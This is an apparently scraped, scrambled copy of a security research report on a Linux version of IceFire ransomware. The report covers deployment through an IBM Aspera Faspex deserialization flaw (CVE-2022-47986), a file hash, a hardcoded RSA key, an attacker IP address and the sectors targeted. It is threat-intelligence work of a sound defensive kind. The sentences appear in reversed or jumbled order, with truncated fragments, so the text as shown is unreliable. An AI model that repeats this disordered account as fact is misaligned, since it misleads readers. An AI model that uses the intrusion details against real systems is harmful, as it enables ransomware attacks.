![]() The relic was near the end of the OpenSSL functionality it is possible that the OpenSSL package contained this artifact and is not necessarily the ransomware developer. cnf extension potentially refers to a configuration file. ![]() In a cryptographic logging function, the binary contains an embedded path referencing the Desktop for a user named “Jhone.” The. ![]() MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI l9Coo0U5VtXj1/13Hds3HVXL5K3 \nZYn/ygsTmRByTU/ZvwoWPqozH4N RTj0W3MG6KSew1n2duKIkBiexMDN Ip/qP2w\nFadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0 EOItH/NRL1PpbkDPP\nc0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu ihjLcIwNd4FsYS Zw9OCH0gnE\nj6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK\ndvO6XAEBWx9cYMEk2oTvk50y8/U41 5GFQIDAQAB The binary contains the following hardcoded RSA public key: Notably, this sample contains many statically linked functions from the legitimate OpenSSL library, contributing to the relatively large file size. Service fingerprinting indexed a vulnerable version of Aspera Faspex softwareĪs of this writing, the IceFire binary was detected by 0/61 VirusTotal engines.Session cookie name: _aspera_faspex_session.Other payload URLs with “aspera” in the secondary hostname section of the URI.Open-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including: The system downloaded two payloads using wget and saves them to /opt/aspera/faspex: In observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of IBM Aspera Faspex file server software. We tested the sample on Intel-based distributions of Ubuntu and Debian IceFire ran successfully on both test systems. The IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary compiled with gcc for AMD64 architecture. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus for organized ransomware actors. Previous reports indicate that IceFire targeted technology companies SentinelLabs observed these recent attacks against organizations in the media and entertainment sector. The attackers tactics are consistent with those of the ‘big-game hunting’ (BGH) ransomware families, which involve double extortion, targeting large enterprises, using numerous persistence mechanisms, and evading analysis by deleting log files. ![]() Prior to this report, IceFire had only shown a Windows-centric focus. The iFire file extension is associated with known reports of IceFire, a ransomware family noted by MalwareHunterTeam in March 2022.Īnother new ransomware just appeared: IceFire.Īlready seen victim companies from multiple countries, including multiple victims from 1-1 countries in the past < 40 hours, so they started “hard” it seems… /QfguAicNYO SentinelLabs recently observed a novel Linux version of the IceFire ransomware being deployed in mid February against enterprise networks. This strategic shift is a significant move that aligns them with other ransomware groups who also target Linux systems. The operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their focus to include Linux.Currently observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a deserialization vulnerability in IBM Aspera Faspex file sharing software.In recent weeks SentinelLabs observed novel Linux versions of IceFire ransomware being deployed within the enterprise network intrusions of several media and entertainment sector organizations worldwide.
0 Comments
Leave a Reply. |